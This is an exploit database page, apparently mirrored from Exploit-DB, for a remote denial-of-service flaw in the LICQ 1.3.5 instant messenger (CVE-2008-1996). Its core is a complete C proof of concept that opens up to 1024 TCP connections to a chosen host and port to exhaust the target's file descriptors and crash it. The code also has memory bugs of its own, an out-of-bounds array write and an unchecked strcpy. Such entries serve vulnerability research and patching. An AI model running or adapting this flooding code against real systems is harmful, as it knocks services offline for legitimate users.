Lucene search
+L

LICQ 1.3.5 - File Descriptor Remote Denial of Service

🗓️ 08 Apr 2008 00:00:00Reported by Milen RangelovType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

LICQ 1.3.5 - Remote Denial of Service due to Exception Handling Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-1996
8 Apr 200800:00
circl
CVE
CVE-2008-1996
28 Apr 200818:21
cve
Cvelist
CVE-2008-1996
28 Apr 200818:21
cvelist
Fedora
[SECURITY] Fedora 9 Update: licq-1.3.5-2.fc9
26 Jul 200805:56
fedora
Fedora
[SECURITY] Fedora 9 Update: licq-1.3.5-2.fc9
13 May 200815:28
fedora
Fedora
[SECURITY] Fedora 8 Update: licq-1.3.4-9.fc8
14 May 200822:09
fedora
Fedora
[SECURITY] Fedora 7 Update: licq-1.3.4-8.fc7
14 May 200822:10
fedora
Tenable Nessus
Fedora 9 : licq-1.3.5-2.fc9 (2008-3812)
16 May 200800:00
nessus
Tenable Nessus
Fedora 7 : licq-1.3.4-8.fc7 (2008-3909)
16 May 200800:00
nessus
Tenable Nessus
Fedora 8 : licq-1.3.4-9.fc8 (2008-3969)
16 May 200800:00
nessus
Rows per page
// source: https://www.securityfocus.com/bid/28679/info

LICQ is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.

A remote attacker can exploit this issue to crash the affected application, denying service to legitimate users. The attacker may also be able to execute code, but this has not been confirmed.

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

// change to suit your needs
#define MAX 1024

int fds[MAX];

int main(int argc, char *argv[])
{
   int port,a;
   char host[12];
   struct sockaddr_in victim;
   struct in_addr inp;

   if (argc!=3)
   {
       printf("usage: %s <ip> <port>\n",argv[0]);
       exit(1);
   }

   port=atoi(argv[2]);
   strcpy(host,argv[1]);
   printf("ip=%s\n",host);

   for (a=1;a<=MAX;a++)
   {
       fds[a]=socket(PF_INET,SOCK_STREAM,0);
       victim.sin_family= AF_INET;
       victim.sin_port=htons(port);
       inet_aton(host,&victim.sin_addr);
       connect(fds[a],&victim,sizeof(victim));
   }

   printf("done!");

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation